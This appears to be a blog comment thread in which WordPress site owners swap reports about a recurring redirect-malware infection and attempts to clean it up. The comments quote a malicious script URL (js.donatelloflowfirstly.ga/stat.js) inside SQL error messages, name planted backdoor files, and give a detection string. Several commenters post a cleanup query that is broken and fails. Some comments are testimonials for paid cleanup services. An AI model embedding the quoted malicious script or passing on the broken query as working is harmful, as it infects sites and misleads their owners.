    UPDATE wp_posts SET post_content = (REPLACE (post_content, “”, ‘’))
    MySQL said: Documentation
    #1064 – You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1′ type=’text/javas…’ at line 1
    Any insights?

  • Krishna says:

    I installed the Wordfence security plugin after my website, which uses Hestia, started redirecting URLs to spam websites. After scanning my website with the plugin it detected that header.php is a malicious file with backdoor activity. Can anybody verify whether it's a false positive or something I should worry about?
    Filename: wp-content/themes/hestia/header.php
    File Type: Not a core, theme, or plugin file from wordpress.org.
    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is:

  • Krishna says:

    The last time this link occurred on my website was on 14th August (Friday)...
    After that, I cleaned my database (especially the posts and options table data),
    deleted all the plugins & themes and re-installed them,
    and also re-installed the WordPress version.
    Deleted all the suspicious files from public_html and refined everything.
    And my website was working fine... until yesterday (Friday), when it (the malicious URL) popped up again.
    But now I can say there could be one of two scenarios:
    1. This link will occur next Friday again (as one of you mentioned that it re-appears every Friday), which proved right in my case also.
    2. Yesterday, I enabled my cache (which I had disabled on 15th Aug after refining my site).
    Having said that, this morning I searched my database & public_html and there is no trace of this malicious URL, but in my main theme this URL was there in the header script.
    So,
    Firstly, I think it happened because I hadn't deleted my cache after refining my website on 14th August (and when I enabled the cache, this brought that URL back).
    Secondly, if this URL keeps coming back every Friday then why don't we have another _a (suspicious) file coming along with it? Which again raises two scenarios:
    1. Either we have not been able to remove it completely from our public_html
    2. Or this URL needs a trigger (a script or file that helps it re-appear on our site)
    To conclude,
    I think it was because of the cache; otherwise this link should have been all over the website again (which was not the case this time, as it only appeared in the header script of my theme).
    Also, I will wait until next Friday and see whether it reappears or not.
    Things you must do immediately after refining your website:
    1. Change your host password, WordPress password, and cPanel password every 15 days. (The major reason is that this virus was in your public_html and most probably also accessed your wp-config file, which contains such data.)
    If anyone finds the root/backdoor of this virus, please mention it.

  • Yadley says:

    Okay, I have discovered that this virus regenerates itself every Friday. This time it was a little more hard-coded and was hidden in my theme's . Looks like this thing will always pop back every Friday and I'm wondering if there's anything we can do every Thursday, perhaps, to stop the regeneration.

    • Uday kushwaha says:

      Which files of your theme got infected?

      • MogaArt says:

        In our case the first attack was on 11 August (Central America). We have restored "clean" backups and the attack comes back, every day!!!!!! First by editing the URLs in the 'wp-options' table of the database from phpMyAdmin; after a new attack the a_ file appeared. We cancelled the account on the server and loaded an even older backup, and the virus reappeared. We have tried changing the versions of the theme, and of WordPress as well. Just yesterday (22 August) we found the mu_plugin folder in wp-content and we are fed up too.
        1. Could it be that we have a plugin in common?
        2. Could it be that the creators of this malware already have our domains registered? We found information that once you are in their database they will never let you go, even if you rebuild the site from scratch...
        User @AHMED ZEIDAN has commented that he has solved it at the root... but we will wait for him to confirm after a few days whether his site is indeed still clean and free.

  • digitalsoon says:

    Interested to know where the backdoor is; even though I can fix it, it comes back...

  • Juan says:

    Good afternoon all:
    UPDATE wp_posts SET post_content = (REPLACE (post_content, “ ”,’ ‘ ));
    When I try to enter the code for the SQL query it gives the following error:
    #1064 – Something is wrong in your syntax near ‘src = ‘https: //js.donatelloflowfirstly.ga/stat.js? N= ns1 ′ type =’ text / ja’ at line 1
    Does anyone have the correct SQL query that they could share?
    Kind regards to all

  • Uday kushwaha says:

    Okay, let me tell you my story. I was first attacked on 5 Aug 2020, I think. It was a simple attack, or that's what I was thinking at the time: someone had changed my website URL in the database so the website was redirected to another URL. I know a little bit about phpMyAdmin, so I logged in to my database using cPanel, changed my site URL in the wp_options table and everything went back to normal. I was relieved and kind of felt like I had fooled the hacker who had just changed the URL of my website somehow, but after 10 days my website got hacked again. This time not only my old website: all the websites on my hosting server got hacked and got that weird line of code in each website's top header, plus continuous firewall alerts from my antivirus about a suspicious URL. I was in shock, and when I checked the cPanel files, every website's index.php file and .js files had been updated with that JavaScript code in them, and the permissions on these files had been changed to 777, which freaked me out. I tried contacting my hosting provider (A2 Hosting); they mentioned that my website had been detected with malware and gave me some reference links that I could use to clean my website myself. Trust me, I didn't understand a single line written in those posts. Instead I tried searching for the "donateall….." URL on Google, and it looks like so many websites are still victims of this malware. Luckily I found some information regarding removal of this malware, so I tried that. First I restored an older working backup of my websites (luckily A2 Hosting keeps backups from a few days back), then I tried accessing the websites. Now the websites were back, but I still got that URL link in my console window with a 404 error, so I tried cleaning those scripts with that URL after logging in to the WordPress dashboard, and with the help of the plugin Better Search Replace I cleaned all my database tables. I installed and updated Wordfence and did a complete scan of all my websites, and along with it I updated my WordPress version to the latest
    and updated all the plugins. Then I was feeling relieved and more secure after that hectic work.
    But the story doesn't end here. It looks like all my websites got hacked again with the same malware, 😭 despite my removing each and every piece of suspected code. I know I can do the above-mentioned solutions again, but how are they getting access to my server and installing that script code in my WordPress files?
    For your information:
    Yes, there was an _a file in my main directory.
    Yes, there was an mu-plugins folder in wp-content containing an rms_unique_wp_mu_pl_fl_nm.php file with some "remote access" code in it.
    I just want to know how to remove this malware completely from my websites to avoid getting hacked again in future. Please please help me out 😭😭😭

  • Ahmed Zeidan says:

    I contacted Hitesh and he did a good job fixing the problem from its roots. Highly recommended to hire him for this tough malware cleanup.
    Thanks Hitesh.

  • Tropixel says:

    Hi guys, I've also had a website of mine hacked twice. I thought I'd cleaned it sufficiently using the above and other recommendations, but it came back again today. It seems to happen on a Friday or a Monday.
    In my case I even upgraded to Cloudflare Pro etc., but it still didn't work, which makes me think that I hadn't cleaned the site properly in the first place.
    Thanks to this thread I found a mu-plugin folder too with that same file in it.
    Hopefully this was the file that caused the issues.

  • Oleg says:

    Hi guys!
    If you are interested, I can help with cleanup from that virus.
    The problem is not only in the database and a few PHP files; this is a complex problem, since the virus infected most JS files too, including the engine, plugins and theme (I count about 1000+ entries in my directories). Plus some backdoors opened from verified plugins (especially if you are using Elementor)!
    Right: mu-plugin, the fixed-header Elementor plugin + some more in the engine. Antivirus doesn't detect that yet!
    So if you feel that you have had success, all clean and restarted, it is highly likely you can have a 2nd wave of attack.
    cheers,
    Oleg

  • Bashiachuki says:

    I have this virus and it's only redirecting to spam links from /shop/ or other WooCommerce pages and products.
    I can't find this virus anywhere.
    I can't run the SQL command, as I am getting this error: Error in query (1064): Syntax error near ‘src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1′ type=’text/javascri’ at line 1
    Can anybody help me out?

  • minoir says:

    It seems this is the most up-to-date version of how to clean the donatello malware.
    By the way, I was in a situation where I cleaned files and themes, deleted "_a", cleaned the database and checked my website links in wp_options, without success.
    I found the solution with the update they mention right here: search for the line "Element.prototype.appendAfter" among my downloaded files, and indeed I found that there were variations of it in the headers of all the JS files of my website. I removed it from all of them and am watching its behaviour.


  • Daniel says:

    You are really awesome, man. Thanks for taking immediate action to fix my WordPress hack, and that at a very reasonable charge.

    I have shared this with many friends who are having this WordPress redirect issue.

  • san mehta says:

    Thank you for fixing the lowerbeforwarden.ml malware on my website. I was not even able to open the WP dashboard. Now it is perfectly fine.

    It’s been three days now and I have not experienced the problem again. Appreciated man!


  • Ratnesh sharma says:

    nice blog
